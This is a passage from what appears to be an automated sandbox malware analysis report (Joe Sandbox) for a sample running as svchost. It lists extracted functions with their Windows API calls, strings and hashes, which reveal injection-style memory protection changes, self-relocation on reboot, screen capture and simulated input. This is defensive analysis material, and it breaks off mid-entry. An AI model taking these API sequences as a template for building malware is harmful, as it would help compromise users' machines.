Opcode ID: 375a116183edb5796773998bfd75a38b65005d899a09b9791748d3b55bb1f5fd
Instruction ID: 68e5c20345b4f07c5586a7aac1adae8b89d289a0c6d28f39f46a654679b73647
Opcode Fuzzy Hash: 375a116183edb5796773998bfd75a38b65005d899a09b9791748d3b55bb1f5fd
Instruction Fuzzy Hash: E6F0447DD80218FBD7109FA0FC49F9D7778EB18705F504544FE02A2380DA706E1486E1

Function 02D02AE0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 02D02AF7
exit.MSVCRT ref: 02D02B05
calloc.MSVCRT ref: 02D02B0E
exit.MSVCRT ref: 02D02B1C
calloc.MSVCRT ref: 02D02B25
exit.MSVCRT ref: 02D02B32
free.MSVCRT(?), ref: 02D02C81
free.MSVCRT(?), ref: 02D02CA9
free.MSVCRT(00000000), ref: 02D02CC5

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: callocexitfree
String ID:
API String ID: 3367576030-0
Opcode ID: a7d0efe70a17a99d9ab0080d8dba03a211a178b9538376dd3b96244a8b63c636
Instruction ID: c7f4690df09028b58f12f2a6d5024d8704f24fa5cd447e0f5d8831bcd2cc557f
Opcode Fuzzy Hash: a7d0efe70a17a99d9ab0080d8dba03a211a178b9538376dd3b96244a8b63c636
Instruction Fuzzy Hash: 4F617C75A01609AFDB10DF68C8C8BAE7BA8FF88314F104419ED469B398D771EE51CB90

Function 02D2D9B0 Relevance: 13.7, APIs: 9, Instructions: 191fileCOMMON

Download Yara Rule

APIs

select.WS2_32(?,00000000,?,00000000,?), ref: 02D2DA31
malloc.MSVCRT ref: 02D2DA4A
malloc.MSVCRT ref: 02D2DA5A
free.MSVCRT(00000000), ref: 02D2DA69
ReadFile.KERNEL32(?,00000000,00002000,?,00000000), ref: 02D2DA95
CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02D2DB77
free.MSVCRT ref: 02D2DB96
free.MSVCRT(?,?,00000000,00000000,00000000,?), ref: 02D2DBB3
free.MSVCRT(00000000), ref: 02D2DBB9

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: free$malloc$CloseFileHandleReadselect
String ID:
API String ID: 158848325-0
Opcode ID: 55761a511831709d477d795b96732bcf01e07a05f2fee356b599a8c11610e675
Instruction ID: 34f18e176806f2aeaebdb8456b8aa76ef999a6658c511eb2788638136e98f930
Opcode Fuzzy Hash: 55761a511831709d477d795b96732bcf01e07a05f2fee356b599a8c11610e675
Instruction Fuzzy Hash: 4251D4719006249FDB10DF689C84BFFB7FAEB55328F200569E559E7380D670AD05CBA0

Function 02D0C100 Relevance: 13.6, APIs: 9, Instructions: 120synchronizationCOMMON

Download Yara Rule

APIs

WindowFromDC.USER32(?), ref: 02D0C10C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D0C144
CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 02D0C152
GetClipRgn.GDI32(?,00000000), ref: 02D0C15C
SelectClipRgn.GDI32(00000000,00000000), ref: 02D0C16C
DeleteObject.GDI32(00000000), ref: 02D0C173
GetViewportOrgEx.GDI32(?,?), ref: 02D0C17E
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 02D0C192
ReleaseMutex.KERNEL32(00000000), ref: 02D0C1D3

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
String ID:
API String ID: 3315380975-0
Opcode ID: 6855a8d66b9572af302494eacb5e2c8f96cc901dba39f57badd2ad87e7dc0612
Instruction ID: 133700c27e47c31e3437f77399bd0a8b5229c163852c2670d7ad6d00a79d870b
Opcode Fuzzy Hash: 6855a8d66b9572af302494eacb5e2c8f96cc901dba39f57badd2ad87e7dc0612
Instruction Fuzzy Hash: 3241FB7A610205AFCB14CF99EC84EAB77F9EB9C755B508A09F909D7380D634EC51CBA0

Function 00401520 Relevance: 13.6, APIs: 9, Instructions: 66fileCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(00401F70,?,0000001C), ref: 0040154F
GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00401565
PathFileExistsA.SHLWAPI(?), ref: 00401572
GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401589
GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 004015A1
MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004015BD
SetFileAttributesA.KERNEL32(?,00000000), ref: 004015CC
DeleteFileA.KERNEL32(?), ref: 004015D9
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004015ED

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
String ID:
API String ID: 2787354276-0
Opcode ID: 3973d0feee2bd4d46e794484f13dae327776c0d4aca43c2d9e078c91308a651e
Instruction ID: 1f2af84f05926cbb5e0b354959f29bdceae47d8b45da359f5ec46e55e0df53d3
Opcode Fuzzy Hash: 3973d0feee2bd4d46e794484f13dae327776c0d4aca43c2d9e078c91308a651e
Instruction Fuzzy Hash: 3F21FCB1D00219AFDB10DBA0DD49FEA77BCAB48700F0045AAA709F6190EB749B448FA5

Function 02D2A010 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 226timeCOMMON

Download Yara Rule

APIs

Part of subcall function 02D303B0: select.WS2_32(?,?,00000000,00000000,?), ref: 02D30437
Part of subcall function 02D303B0: __WSAFDIsSet.WS2_32(?,?), ref: 02D30468
Part of subcall function 02D303B0: recv.WS2_32(?,?,00000005,00000000), ref: 02D3048B
Part of subcall function 02D303B0: recv.WS2_32(?,?,00000004,00000000), ref: 02D304AD
Part of subcall function 02D303B0: socket.WS2_32(00000002,00000001,00000000), ref: 02D304C6
Part of subcall function 02D303B0: setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 02D304E2

malloc.MSVCRT ref: 02D2A033
GetSystemTime.KERNEL32(?), ref: 02D2A107
GetSystemTime.KERNEL32(?), ref: 02D2A152
GetSystemTime.KERNEL32(00000000,?), ref: 02D2A1E4
GetSystemTime.KERNEL32(SYSTEM!216041!38425AAC,?), ref: 02D2A232
free.MSVCRT(00000000), ref: 02D2A2EF

Strings

SYSTEM!216041!38425AAC, xrefs: 02D2A231

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: SystemTime$recv$freemallocselectsetsockoptsocket
String ID: SYSTEM!216041!38425AAC
API String ID: 2153857484-2637391767
Opcode ID: f5184828980c4ec211ab11510030acf629b829ecde9f428a5135c29a08e8b0ee
Instruction ID: 0ae67b7e95de43463cf62b44aa97afd128162c5fb8d6480f94fd88a5dc862fce
Opcode Fuzzy Hash: f5184828980c4ec211ab11510030acf629b829ecde9f428a5135c29a08e8b0ee
Instruction Fuzzy Hash: 1791E331A00A258FDB28CF28C1547BEBBF1EF54318F14466EE4969B784D735E885CB60

Function 02D1AAC0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 98libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D1AAD7
GetVersionExW.KERNEL32(?), ref: 02D1AAFA
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D1ABCB
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02D1ABDC
GetCurrentProcess.KERNEL32(00000000), ref: 02D1ABEC

Strings

IsWow64Process, xrefs: 02D1ABD6
kernel32.dll, xrefs: 02D1ABB9

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcessVersionmemset
String ID: IsWow64Process$kernel32.dll
API String ID: 877405840-3024904723
Opcode ID: ef37cdd3da0c5a9d9cfe4418ad8c97a33e21be5a08fe71d54b65468092b416a4
Instruction ID: cb10e7cc80ee4e2b0cc439f3f14c785dd70d2b8ccf6eea217c93aab33f53a699
Opcode Fuzzy Hash: ef37cdd3da0c5a9d9cfe4418ad8c97a33e21be5a08fe71d54b65468092b416a4
Instruction Fuzzy Hash: 05319E34A02299ABDF38CF64EA95BF973B6AF01304F400199D60596B40EB719E90CB50

Function 02D1BAC6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 79threadCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5C590552), ref: 02D1BAE7
CreateThread.KERNEL32(00000000,00000000,Function_0001C350,02D5A080,00000000,00000000), ref: 02D1BB80
GetHandleInformation.KERNEL32(00000000,?), ref: 02D1BB98
CloseHandle.KERNEL32(00000000), ref: 02D1BBA9

Strings

5C590552, xrefs: 02D1BAE2, 02D1BAED
keys, xrefs: 02D1BB2B
\t, xrefs: 02D1BAE7

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$BackslashCloseCreateInformationPathThread
String ID: 5C590552$keys$\t
API String ID: 3186380484-2108894918
Opcode ID: d961dd377982ddda4e549f492d146739303ecdc0271ae106878eba55fba8979f
Instruction ID: de5687e850901fcb84f0963b4f3664e5e608d408f1623ca32a542832ee096b83
Opcode Fuzzy Hash: d961dd377982ddda4e549f492d146739303ecdc0271ae106878eba55fba8979f
Instruction Fuzzy Hash: 162148309042596BDB218F74B928BEE7BE4EF49308F2441C6E886D7780DBB19D08C794

Function 02D15600 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D15628
RegQueryValueExA.ADVAPI32(02D1676C,a3b7fd77a,00000000,?,00000000,?), ref: 02D1566A
RegCloseKey.ADVAPI32(02D1676C), ref: 02D15674
RegOpenKeyExA.ADVAPI32(-80000001), ref: 02D1563A

Part of subcall function 02D03600: IsUserAnAdmin.SHELL32 ref: 02D03608
Part of subcall function 02D03600: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02D15686), ref: 02D0363F
Part of subcall function 02D03600: RegQueryValueExA.ADVAPI32(02D15686,a3b7fb90a,00000000,?,00000000,?), ref: 02D0365C
Part of subcall function 02D03600: RegCloseKey.ADVAPI32(02D15686), ref: 02D03666
Part of subcall function 02D03600: RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02D03699
Part of subcall function 02D03600: RegQueryValueExA.ADVAPI32(?,a3b7fb90a,00000000,?,00000000,?), ref: 02D036B6
Part of subcall function 02D03600: RegCloseKey.ADVAPI32(?), ref: 02D036C0

Strings

A3B7F2CEa, xrefs: 02D15652, 02D15668
a3b7fd77a, xrefs: 02D1564B
software\microsoft, xrefs: 02D1561C

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue$AdminUser
String ID: A3B7F2CEa$a3b7fd77a$software\microsoft
API String ID: 2113243795-3319289815
Opcode ID: ffdfafc628ed2e45669cc06f77597a6d8013cb5209852c6c6eaba0a8a66761b1
Instruction ID: bd1b38ae792cbd7347aa38deb806f37146d2f886cd05582afafcd5176615d5e1
Opcode Fuzzy Hash: ffdfafc628ed2e45669cc06f77597a6d8013cb5209852c6c6eaba0a8a66761b1
Instruction Fuzzy Hash: B0018079E90209BBDB00DFF4EC45BAEB7B8EB08605F904648F515D6380E6789D048BA0

Function 02D1A040 Relevance: 12.1, APIs: 8, Instructions: 139memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7591F550,00000000,75A7BD50,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A078
memcpy.MSVCRT ref: 02D1A0A0
VirtualProtect.KERNEL32(00000000,?,00000040,02D1938A,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A135
VirtualProtect.KERNEL32(?,00000000,00000040,02D1938A,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A14A
VirtualProtect.KERNEL32(?,00000000,02D1938A,?,?,?,00000000,00000000,?,?,?,?,?,?,02D1938A,00000000), ref: 02D1A17A
VirtualProtect.KERNEL32(?,00000000,02D1938A,?,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A186

Part of subcall function 02D1A1B0: WaitForSingleObject.KERNEL32(?,000003E8,00000000,02D1A193,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A1BC
Part of subcall function 02D1A1B0: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A1C6
Part of subcall function 02D1A1B0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A1CD
Part of subcall function 02D1A1B0: memset.MSVCRT ref: 02D1A1DE
Part of subcall function 02D1A1B0: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A22A

GetCurrentProcess.KERNEL32(00000000,00000000,7591F550,00000000,75A7BD50,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A197
FlushInstructionCache.KERNEL32(00000000,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A19E

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
String ID:
API String ID: 2609073853-0
Opcode ID: 1b46c906373b803aece6fb1fc0777dfd6eaf9180f4e03054f0a7eea7a0cd5065
Instruction ID: 9fc92f01692762fef0f584584fda940035e76476da3c4b6ad2ea3e1303fcbb11
Opcode Fuzzy Hash: 1b46c906373b803aece6fb1fc0777dfd6eaf9180f4e03054f0a7eea7a0cd5065
Instruction Fuzzy Hash: 6E413B7AA40216BBCB149E789C84FBABB6AEF54254F144129F94987388DA35ED01C7F0

Function 02D2D827 Relevance: 12.1, APIs: 8, Instructions: 87stringfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,02D4AD0C,?,00000001,?), ref: 02D2D83C
memcpy.MSVCRT ref: 02D2D856
lstrlenW.KERNEL32(?), ref: 02D2D865
WideCharToMultiByte.KERNEL32(000004E3,00000000,?,00000001,?,00000001,00000000,00000000), ref: 02D2D883
lstrlenW.KERNEL32(?), ref: 02D2D88C
WideCharToMultiByte.KERNEL32(000004E3,00000000,?,00000000,?,00000000,00000000,00000000), ref: 02D2D8AD
FindNextFileW.KERNEL32(?,?), ref: 02D2D8ED
FindClose.KERNEL32(?), ref: 02D2D8FC

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: lstrlen$ByteCharFindMultiWide$CloseFileNextmemcpy
String ID:
API String ID: 2429061842-0
Opcode ID: bcda8c133bad9a11d69bc3e8c57fd2ac21561f0ae83d49a257751615faba5266
Instruction ID: 6f14b718935c386871cc9a804d28cd67b55ade6c41b33b51603b39fa1456849d
Opcode Fuzzy Hash: bcda8c133bad9a11d69bc3e8c57fd2ac21561f0ae83d49a257751615faba5266
Instruction Fuzzy Hash: F221BA725402257FEB20DBA0DC49FEB777DAB94704F104595B708DB180EB70AA49CFA4

Function 004012E0 Relevance: 12.1, APIs: 8, Instructions: 84fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,755CDB30,?,00401E75,00000000), ref: 00401317
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00401E75,00000000), ref: 0040132C
LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00401E75,00000000), ref: 0040133B
WriteFile.KERNEL32(00000000,?,00000000,00401E75,00000000,?,00401E75,00000000), ref: 0040134D
UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00401E75,00000000), ref: 0040135D
SetEndOfFile.KERNEL32(00000000), ref: 0040136A
GetHandleInformation.KERNEL32(00000000,00000000), ref: 0040138C
CloseHandle.KERNEL32(00000000), ref: 0040139D

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: File$Handle$CloseCreateInformationLockPointerUnlockWrite
String ID:
API String ID: 1080409958-0
Opcode ID: 767d19d3de4797b5c71be3d902a88e0ab7c1d0a14529f93e3769efd59d7c6aec
Instruction ID: fc3a19f52fd50960abd89716b3b21a8dc97a86bf959a0b9d512ee5003149b17c
Opcode Fuzzy Hash: 767d19d3de4797b5c71be3d902a88e0ab7c1d0a14529f93e3769efd59d7c6aec
Instruction Fuzzy Hash: 0E21BE71A00204BBF7205B65DD4DFAB7A6CEBC1B51F148126FF00B66E0D7B84E81C6A8

Function 02D0DAF0 Relevance: 12.1, APIs: 8, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(00000000,00000005), ref: 02D0DB0C
GetWindow.USER32(00000000), ref: 02D0DB0F
IsWindowVisible.USER32(00000000), ref: 02D0DB21
GetWindowLongA.USER32(00000000,000000F0), ref: 02D0DB32
GetClassNameA.USER32(00000000,?,00000101), ref: 02D0DB4C
PostMessageA.USER32(00000000,00000100,0000001B,00000000), ref: 02D0DBA6
PostMessageA.USER32(00000000,00000101,0000001B,C01B0000), ref: 02D0DBB5
GetWindow.USER32(00000000,00000003), ref: 02D0DBBA

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Window$MessagePost$ClassLongNameVisible
String ID:
API String ID: 4167699426-0
Opcode ID: 456e1b42c137db7e956eae5977c8e68d551927808a36fa8aff0dd2058d7e25b3
Instruction ID: 08823bf686245fd65e86189fad165a4efa1d5be8736db97cbf262968baa2b26c
Opcode Fuzzy Hash: 456e1b42c137db7e956eae5977c8e68d551927808a36fa8aff0dd2058d7e25b3
Instruction Fuzzy Hash: 55210535A803142BE730AE75ECD9FAB73B9EB09725F400616F645A63D0DBE49C50C5A4

Function 02D08380 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 02D08388
SelectObject.GDI32(?,00000000), ref: 02D083A8
DeleteObject.GDI32(?), ref: 02D083B1
DeleteDC.GDI32(?), ref: 02D083BD
CreateCompatibleDC.GDI32(00000000), ref: 02D083F2
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02D08411
SelectObject.GDI32(?,00000000), ref: 02D08433
ReleaseDC.USER32(00000000,00000000), ref: 02D08441

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Object$CompatibleCreateDeleteSelect$BitmapRelease
String ID:
API String ID: 2733039346-0
Opcode ID: 68ed2c1efd38dedcd24ee2ffad25bded2da0b5650fb19aa62cea7f54794d8b4f
Instruction ID: 4861b50243a1e5de0368e0608db3e592b668834833db34114c3eefb1260b7c25
Opcode Fuzzy Hash: 68ed2c1efd38dedcd24ee2ffad25bded2da0b5650fb19aa62cea7f54794d8b4f
Instruction Fuzzy Hash: 5611E7B99813109FCB10DFA8F89CEA637E8AB8D6147544955E588C3321D6B8AC61CFA0

Function 02D09990 Relevance: 10.7, APIs: 7, Instructions: 167synchronizationwindowkeyboardCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,?,?,02D09CF9,00000000,?,?,?,?,02D091A0,?,?), ref: 02D099F1
MapVirtualKeyW.USER32(00000000,00000000), ref: 02D09A0F
ReleaseMutex.KERNEL32(00000000,?,?,?,?,02D09CF9,00000000,?,?,?,?,02D091A0,?,?), ref: 02D09ADF
ReleaseMutex.KERNEL32(00000000,?,?,?,?,02D09CF9,00000000,?,?,?,?,02D091A0,?,?), ref: 02D09B01
SendMessageA.USER32(?,0000E2AD,00000000,00000000), ref: 02D09B48
SendMessageW.USER32(?,?,00000003,00000000), ref: 02D09B6E
PostMessageW.USER32(?,00000101,?,?), ref: 02D09B7B

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Message$MutexReleaseSend$ObjectPostSingleVirtualWait
String ID:
API String ID: 3783495248-0
Opcode ID: 2099e53fdee3b743648f1694e6f1c65fbf6aec4b7ef04f0c6f2790f18f872f7d
Instruction ID: 4635c3f4ee518c46eb9d2475ed1864811cdd5e4eb50a30b14abec3e1659e0c14
Opcode Fuzzy Hash: 2099e53fdee3b743648f1694e6f1c65fbf6aec4b7ef04f0c6f2790f18f872f7d
Instruction Fuzzy Hash: 17512836A48380AFD721CF69A8A4BE67BD0DB46768F484589E8C1873E3C3B48D55D790

Function 02D0C8C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(02D0D04D), ref: 02D0C8DF
GetWindowInfo.USER32(02D0D04D,?), ref: 02D0C8F9
GetClassLongA.USER32(02D0D04D,000000E6), ref: 02D0C94E
PrintWindow.USER32(02D0D04D,?,00000000), ref: 02D0C967
BitBlt.GDI32(02D0CB32,?,?,?,?,75A8BCB0,00000000,00000000,00CC0020), ref: 02D0CA0E

Part of subcall function 02D0DA30: GetClassNameA.USER32(?,?,00000101), ref: 02D0DA46

Part of subcall function 02D0C700: SendMessageA.USER32(?,?,00000004,00000000), ref: 02D0C728
Part of subcall function 02D0C700: GdiFlush.GDI32(00000000,?,?,75A73EB0,?,?,?,02D090B9), ref: 02D0C73E
Part of subcall function 02D0C700: BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 02D0C764

Strings

<, xrefs: 02D0C8F2

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
String ID: <
API String ID: 2334662925-4251816714
Opcode ID: 1422cda1c632ef8470d61bf45382b4626e966364dce92d86e519eaf7a17dabd9
Instruction ID: 935768392a61746b23f24ee34a13bbd8403bd915c0ef03d53f0665bb17f637d7
Opcode Fuzzy Hash: 1422cda1c632ef8470d61bf45382b4626e966364dce92d86e519eaf7a17dabd9
Instruction Fuzzy Hash: 97416871E10519AFCB14CF99D8C4BAEBBBAFF48345F64421AE409A7790D730AD51CBA0

Function 02D057D0 Relevance: 10.6, APIs: 7, Instructions: 110synchronizationCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D05810
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D0583C
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D05863
GetLastError.KERNEL32 ref: 02D05884
WaitForSingleObject.KERNEL32(0000030C,000003E8), ref: 02D058B4
ReleaseMutex.KERNEL32(0000030C), ref: 02D058D5
SetLastError.KERNEL32(?), ref: 02D058EE

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
String ID:
API String ID: 2971961948-0
Opcode ID: 9fc4046682ca312e2ed09f6de5e11922ef73b475949195db62de0d501adcf4ca
Instruction ID: e4221a0a49dcd1dd74e6105e45361c8b3de5c0aaae0c03f1f293b1f3611cee40
Opcode Fuzzy Hash: 9fc4046682ca312e2ed09f6de5e11922ef73b475949195db62de0d501adcf4ca
Instruction Fuzzy Hash: 4141C475D40208EFDB40CFA9E984AADBBF5FB48310B94456AE904E7350E771AD01CF94

Function 02D10AF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104networkCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D10B23
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D10B4F
